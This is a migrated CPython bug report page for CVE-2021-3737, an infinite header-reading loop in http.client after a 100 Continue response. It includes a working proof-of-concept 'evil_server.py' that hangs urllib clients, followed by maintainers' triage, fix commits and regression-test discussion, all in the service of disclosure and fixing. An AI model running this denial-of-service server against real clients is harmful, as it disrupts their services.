Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-3737: urllib http client possible infinite loop on a 100 Continue response #88188

Closed
leveryd mannequin opened this issue May 3, 2021 · 29 comments
Closed

CVE-2021-3737: urllib http client possible infinite loop on a 100 Continue response #88188

leveryd mannequin opened this issue May 3, 2021 · 29 comments
Assignees
Labels
3.7 (EOL) end of life 3.8 only security fixes 3.9 only security fixes 3.10 only security fixes stdlib Python modules in the Lib dir type-security A security issue

Comments

@leveryd
Copy link
Mannequin

leveryd mannequin commented May 3, 2021

BPO 44022
Nosy @gpshead, @vstinner, @tiran, @ned-deily, @mcepl, @ambv, @mgorny, @sir-sigurd, @miss-islington, @gen-xu
PRs
  • bpo-44022: Fix http client infinite line reading (DoS) after a http 100 #25916
  • [3.10] bpo-44022: Fix http client infinite line reading (DoS) after a HTTP 100 Continue (GH-25916) #25931
  • [3.9] bpo-44022: Fix http client infinite line reading (DoS) after a HTTP 100 Continue (GH-25916) #25932
  • [3.8] bpo-44022: Fix http client infinite line reading (DoS) after a HTTP 100 Continue (GH-25916) #25933
  • [3.7] bpo-44022: Fix http client infinite line reading (DoS) after a HTTP 100 Continue (GH-25916) #25934
  • [3.6] bpo-44022: Fix http client infinite line reading (DoS) after a HTTP 100 Continue (GH-25916) #25935
  • bpo-44022: Improve the security fix regression test. #26503
  • [3.10] bpo-44022: Improve the regression test. (GH-26503) #26504
  • [3.9] bpo-44022: Improve the regression test. (GH-26503) #26505
  • [3.8] bpo-44022: Improve the regression test. (GH-26503) #26506
  • [3.7] bpo-44022: Improve the regression test. (GH-26503) #26507
  • [3.6] bpo-44022: Improve the regression test. (GH-26503) #26508
  • bpo-44022: Fix Sphinx role in NEWS entry #27033
  • Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.

    Show more details

    GitHub fields:

    assignee = 'https://github.com/gpshead'
    closed_at = <Date 2021-05-05.22:50:44.568>
    created_at = <Date 2021-05-03.17:13:03.971>
    labels = ['type-security', '3.8', '3.9', '3.10', '3.7', 'library']
    title = 'CVE-2021-3737: urllib http client possible infinite loop on a 100 Continue response'
    updated_at = <Date 2021-09-15.09:49:12.121>
    user = 'https://bugs.python.org/leveryd'

    bugs.python.org fields:

    activity = <Date 2021-09-15.09:49:12.121>
    actor = 'vstinner'
    assignee = 'gregory.p.smith'
    closed = True
    closed_date = <Date 2021-05-05.22:50:44.568>
    closer = 'gregory.p.smith'
    components = ['Library (Lib)']
    creation = <Date 2021-05-03.17:13:03.971>
    creator = 'leveryd'
    dependencies = []
    files = []
    hgrepos = []
    issue_num = 44022
    keywords = ['patch']
    message_count = 29.0
    messages = ['392825', '393004', '393005', '393037', '393048', '393050', '393051', '393073', '393074', '393076', '393079', '393110', '393113', '393137', '393194', '393195', '394898', '394976', '394978', '394980', '394982', '394985', '394986', '396993', '397322', '399275', '401819', '401820', '401821']
    nosy_count = 11.0
    nosy_names = ['gregory.p.smith', 'vstinner', 'christian.heimes', 'ned.deily', 'mcepl', 'lukasz.langa', 'mgorny', 'sir-sigurd', 'miss-islington', 'leveryd', 'gen-xu']
    pr_nums = ['25916', '25931', '25932', '25933', '25934', '25935', '26503', '26504', '26505', '26506', '26507', '26508', '27033']
    priority = 'normal'
    resolution = 'fixed'
    stage = 'resolved'
    status = 'closed'
    superseder = None
    type = 'security'
    url = 'https://bugs.python.org/issue44022'
    versions = ['Python 3.6', 'Python 3.7', 'Python 3.8', 'Python 3.9', 'Python 3.10']

    @leveryd
    Copy link
    Mannequin Author

    leveryd mannequin commented May 3, 2021

    if a client request a http/https/ftp service which is controlled by attacker, attacker can make this client hang forever, event client has set "timeout" argument.

    maybe this client also will consume more and more memory. i does not test on this conclusion.

    client.py

    import urllib.request
    
    req = urllib.request.Request('http://127.0.0.1:8085')
    response = urllib.request.urlopen(req, timeout=1)
    

    evil_server.py

    # coding:utf-8
    from socket import *
    from multiprocessing import *
    from time import sleep
    
    def dealWithClient(newSocket,destAddr):
        recvData = newSocket.recv(1024)
        newSocket.send(b"""HTTP/1.1 100 OK\n""")
    
        while True:
            # recvData = newSocket.recv(1024)
            newSocket.send(b"""x:a\n""")
    
            if len(recvData)>0:
                # print('recv[%s]:%s'%(str(destAddr), recvData))
                pass
            else:
                print('[%s]close'%str(destAddr))
                sleep(10)
                print('over')
                break
    
        # newSocket.close()
    
    
    def main():
    
        serSocket = socket(AF_INET, SOCK_STREAM)
        serSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR  , 1)
        localAddr = ('', 8085)
        serSocket.bind(localAddr)
        serSocket.listen(5)
    
        try:
            while True:
                newSocket,destAddr = serSocket.accept()
    
                client = Process(target=dealWithClient, args=(newSocket,destAddr))
                client.start()
    
                newSocket.close()
        finally:
            serSocket.close()
    
    if __name__ == '__main__':
        main()
    

    @leveryd leveryd mannequin added 3.7 (EOL) end of life stdlib Python modules in the Lib dir type-security A security issue labels May 3, 2021
    @gen-xu
    Copy link
    Mannequin

    gen-xu mannequin commented May 5, 2021

    Added a possible PR. Review will be appreicated.

    @gen-xu
    Copy link
    Mannequin

    gen-xu mannequin commented May 5, 2021

    Looks like it is caused by the httplib not limiting total header size after receiving 100. Added a counter for that to be same size as _MAXLINE=65536.

    @gen-xu gen-xu mannequin removed 3.7 (EOL) end of life labels May 5, 2021
    @gpshead gpshead added 3.9 only security fixes 3.10 only security fixes 3.11 only security fixes labels May 5, 2021
    @gpshead gpshead changed the title "urllib" will result to deny of service urllib http client possible infinite loop on a 100 Continue response May 5, 2021
    @gpshead gpshead self-assigned this May 5, 2021
    @gpshead gpshead added 3.9 only security fixes 3.10 only security fixes 3.11 only security fixes labels May 5, 2021
    @gpshead gpshead changed the title "urllib" will result to deny of service urllib http client possible infinite loop on a 100 Continue response May 5, 2021
    @gpshead gpshead self-assigned this May 5, 2021
    @gpshead
    Copy link
    Member

    gpshead commented May 5, 2021

    The bug: Our http client can get stuck infinitely reading len(line) < 64k lines after receiving a '100 Continue' http response. So yes, this could lead to our client being a bandwidth sink for anyone in control of a server.

    Clear issue: That's a denial of network bandwidth and the denial of service in terms of CPU needed to process read and skip such lines. The infinite lines are size bounded and are not buffered so there is no memory based DoS.

    Maybe issue: If a the underlying socket has a timeout set on it, it can be used to prevent the timeout from triggering by sending a line more often than the timeout. this is a denial of service by making a http client connection that an author may have assumed would timeout based on their socket.setdefaulttimeout() settings hang forever.

    I expect there are plenty of other ways to accomplish the latter in our http client code though. Ex: A regular response with a huge content length where one byte is transmitted occasionally could also effectively accomplish that. The stdlib http stack doesn't have its own overall http transaction timeout as a feature.

    @gpshead
    Copy link
    Member

    gpshead commented May 5, 2021

    Thanks guangli dong (leveryd)!

    This is in and the 3.10-3.6 PRs should automerge (thru 3.9) after the CI runs, or be merged by the release managers (3.6-3.8).

    @gpshead gpshead closed this as completed May 5, 2021
    @gpshead gpshead closed this as completed May 5, 2021
    @miss-islington
    Copy link
    Contributor

    New changeset ea93270 by Miss Islington (bot) in branch '3.9':
    bpo-44022: Fix http client infinite line reading (DoS) after a HTTP 100 Continue (GH-25916)
    ea93270

    @gpshead
    Copy link
    Member

    gpshead commented May 5, 2021

    New changeset 60ba0b6 by Miss Islington (bot) in branch '3.10':
    bpo-44022: Fix http client infinite line reading (DoS) after a HTTP 100 Continue (GH-25916) (GH-25931)
    60ba0b6

    @leveryd
    Copy link
    Mannequin Author

    leveryd mannequin commented May 6, 2021

    can you assign "cve" for this security bug?

    i will review the patch later.

    @tiran
    Copy link
    Member

    tiran commented May 6, 2021

    http.server is out of scope for CVEs. The module is not designed for security-sensitive usage and explicitly documented as insecure and not suitable for production use:

    https://docs.python.org/3/library/http.server.html#module-http.server

    Warning: http.server is not recommended for production. It only implements basic security checks.

    @ambv
    Copy link
    Contributor

    ambv commented May 6, 2021

    New changeset f396864 by Miss Islington (bot) in branch '3.8':
    bpo-44022: Fix http client infinite line reading (DoS) after a HTTP 100 Continue (GH-25916) (bpo-25933)
    f396864

    @ned-deily ned-deily removed 3.8 only security fixes 3.9 only security fixes 3.10 only security fixes 3.11 only security fixes labels May 6, 2021
    @gpshead
    Copy link
    Member

    gpshead commented May 6, 2021

    If anyone wants a CVE for it, that's up to them. This bug is in the CPython http.client module which is what urllib uses for http/https. I'd rate it low severity. A malicious server can hold a http connection from this library open as a network traffic sink. There are other ways to do that. ex: Just use omit a content-length header in a server response and start streaming an infinite response.

    The difference in this case being that since the data is thrown away, it isn't going to result in memory exhaustion and kill the unfortunate process as trying to read an infinite response would. That's the primary DoS potential from my point of view.

    @ned-deily ned-deily added 3.8 only security fixes 3.9 only security fixes 3.10 only security fixes labels May 6, 2021
    @leveryd
    Copy link
    Mannequin Author

    leveryd mannequin commented May 7, 2021

    @gregory P. Smith

    yes, i agree that there are many other ways to make "urllib" or "httplib" such http client hang, because "timeout" is not global read timeout, this "timeout" has effects when every "read socket" operation.

    why you think it will not result in memory exhaustion?

    the "hlist" list will not be more and more larger? i use "top" command to observe, and find the "client.py" process's memory is more and more larger slowly.

    httplib.py
    
    while True:
        ...
        line = self.fp.readline(_MAXLINE + 1)
        ...
        hlist.append(line)
    

    the last, would you mind remove "100 Continue" in this bug title? i think it will maybe make others misunderstand that this bug only occur when response status code is "100".

    @gpshead
    Copy link
    Member

    gpshead commented May 7, 2021

    httplib.py is a Python 2 concept. Python 2 is end of life. bugs.python.org no longer tracks issues with its code. I don't doubt that Python 2.7 has bugs. As a matter of policy, we don't care - https://www.python.org/doc/sunset-python-2/. Python 3.6 as that is the oldest branch still open for security fixes.

    The PRs associated with this issue fixed a codepath in Python 3 that only happened after a '100' response. That codepath did not accumulate headers:

                if status != CONTINUE:
                    break
                # skip the header from the 100 response
                while True:
                    skip = self.fp.readline(_MAXLINE + 1)
                    if len(skip) > _MAXLINE:
                        raise LineTooLong("header line")
                    skip = skip.strip()
                    if not skip:
                        break
    
    CONTINUE = 100; meaning that loop only runs after receiving what appears to be a 100 continue response.  And it does not accumulate data.

    There is no hlist in the original pre-fix Python 3.6+ code. Nor any header accumulation caused by this the client.py talking to evil_server.py as described in this issues opening message.

    @mgorny
    Copy link
    Mannequin

    mgorny mannequin commented Jun 2, 2021

    The test added for this bug is insufficient to verify the fix. If I revert the Lib/http/client.py change, the test still passes. This is because a subclass of client.HTTPException is still raised.

    If I add an explicit begin() call to trigger the exception, then without the fix I get:

    File "/tmp/cpython/Lib/test/test_httplib.py", line 1189, in test_overflowing_header_limit_after_100
    resp.begin()
    File "/tmp/cpython/Lib/http/client.py", line 308, in begin
    version, status, reason = self._read_status()
    File "/tmp/cpython/Lib/http/client.py", line 277, in _read_status
    raise RemoteDisconnected("Remote end closed connection without"
    http.client.RemoteDisconnected: Remote end closed connection without response

    With the fix, I get (correctly):

    test test_httplib failed -- Traceback (most recent call last):
      File "/tmp/cpython/Lib/test/test_httplib.py", line 1189, in test_overflowing_header_limit_after_100
        resp.begin()
      File "/tmp/cpython/Lib/http/client.py", line 321, in begin
        skipped_headers = _read_headers(self.fp)
      File "/tmp/cpython/Lib/http/client.py", line 218, in _read_headers
        raise HTTPException("got more than %d headers" % _MAXHEADERS)
    http.client.HTTPException: got more than 100 headers

    However, the test considers both exceptions to match.

    @gpshead
    Copy link
    Member

    gpshead commented Jun 3, 2021

    Great catch! The new PR should address that.

    @gpshead
    Copy link
    Member

    gpshead commented Jun 3, 2021

    New changeset e60ab84 by Gregory P. Smith in branch 'main':
    bpo-44022: Improve the regression test. (GH-26503)
    e60ab84

    @miss-islington
    Copy link
    Contributor

    New changeset 98e5a79 by Miss Islington (bot) in branch '3.10':
    bpo-44022: Improve the regression test. (GH-26503)
    98e5a79

    @miss-islington
    Copy link
    Contributor

    New changeset 5df4abd by Miss Islington (bot) in branch '3.9':
    bpo-44022: Improve the regression test. (GH-26503)
    5df4abd

    @ned-deily
    Copy link
    Member

    New changeset fee9642 by Miss Islington (bot) in branch '3.7':
    bpo-44022: Improve the regression test. (GH-26503) (GH-26507)
    fee9642

    @ned-deily
    Copy link
    Member

    New changeset 1b6f4e5 by Miss Islington (bot) in branch '3.6':
    bpo-44022: Improve the regression test. (GH-26503) (GH-26508)
    1b6f4e5

    @miss-islington
    Copy link
    Contributor

    New changeset 7ac7a0c by Sergey Fedoseev in branch 'main':
    bpo-44022: Fix Sphinx role in NEWS entry (GH-27033)
    7ac7a0c

    @ambv
    Copy link
    Contributor

    ambv commented Jul 12, 2021

    New changeset 0389426 by Miss Islington (bot) in branch '3.8':
    bpo-44022: Improve the regression test. (GH-26503) (bpo-26506)
    0389426

    @mcepl
    Copy link
    Mannequin

    mcepl mannequin commented Aug 9, 2021

    Is there a CVE for this?

    @vstinner
    Copy link
    Member

    Matej Cepl: "Is there a CVE for this?"

    Yes, CVE-2021-3737 was assigned to this issue.

    @vstinner vstinner changed the title urllib http client possible infinite loop on a 100 Continue response CVE-2021-3737: urllib http client possible infinite loop on a 100 Continue response Sep 15, 2021
    @vstinner vstinner changed the title urllib http client possible infinite loop on a 100 Continue response CVE-2021-3737: urllib http client possible infinite loop on a 100 Continue response Sep 15, 2021
    @vstinner
    Copy link
    Member

    @vstinner
    Copy link
    Member

    I'm not sure why the fix in the main branch was not listed here:

    commit 47895e3
    Author: Gen Xu <xgbarry@gmail.com>
    Date: Wed May 5 15:42:41 2021 -0700

    bpo-44022: Fix http client infinite line reading (DoS) after a HTTP 100 Continue (GH-25916)
    
    Fixes http.client potential denial of service where it could get stuck reading lines from a malicious server after a 100 Continue response.
    
    Co-authored-by: Gregory P. Smith <greg@krypto.org>
    

    @ezio-melotti ezio-melotti transferred this issue from another repository Apr 10, 2022
    Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
    Labels
    3.7 (EOL) end of life 3.8 only security fixes 3.9 only security fixes 3.10 only security fixes stdlib Python modules in the Lib dir type-security A security issue
    Projects
    None yet
    Development

    No branches or pull requests

    6 participants